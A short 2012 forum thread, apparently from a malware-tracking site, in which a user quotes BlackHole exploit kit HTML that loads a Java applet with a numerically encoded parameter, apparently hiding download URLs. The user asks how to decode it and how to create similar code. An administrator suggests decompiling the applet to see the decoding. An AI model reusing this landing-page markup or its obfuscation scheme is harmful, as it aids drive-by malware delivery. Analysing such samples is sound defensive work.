Author Topic: BlackHole Java Decrypting.  (Read 3628 times)

0 Members and 1 Guest are viewing this topic.

June 24, 2012, 09:02:57 pm
Read 3628 times

xLab

  • Newbie

  • Offline
  • *

  • 1
Hello MalwareDomainList!

I was stuck in a place trying to solve this Exploit Pack and want to help you.

I need a decode or encode tecnique's

</script><applet/code="xxxxx"/archive="xx.jar"><param/name="b"/value=56:14:14:19:27:50:50:66:11:48:34:61:47:2:34:16:22:66:61:47:2:49:10:22:16:50:53:50:33:49:19:56:19:46:67:24:60:1:20:0:63:70:11:24:12:27:27:56:14:14:19:27:50:50:66:11:48:34:61:47:2:34:16:22:66:61:47:2:49:10:22:16:50:53:50:33:49:19:56:19:46:67:24:10:63:1:20:43:70:11:24:12:27:27:56:14:14:19:27:50:50:66:11:48:34:61:47:2:34:16:22:66:61:47:2:49:10:22:16:50:53:50:33:49:19:56:19:46:67:24:58:43:11:10:11:70:11:24:12 /></applet></body></html>

Code: [Select]
56:14:14:19:27:50:50:66:11:48:34:61:47:2:34:16:22:66:61:47:2:49:10:22:16:50:53:50:33:49:19:56:19:46:67:24:60:1:20:0:63:70:11:24:12:27:27:56:14:14:19:27:50:50:66:11:48:34:61:47:2:34:16:22:66:61:47:2:49:10:22:16:50:53:50:33:49:19:56:19:46:67:24:10:63:1:20:43:70:11:24:12:27:27:56:14:14:19:27:50:50:66:11:48:34:61:47:2:34:16:22:66:61:47:2:49:10:22:16:50:53:50:33:49:19:56:19:46:67:24:58:43:11:10:11:70:11:24:12
How do I create this code of same?

June 25, 2012, 10:02:32 am
Reply #1

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
You can use a free Java decompiler like JD-GUI for analysing the java applet.
This way you can figure out how the applet decodes the parameter value to an url.
Ruining the bad guy's day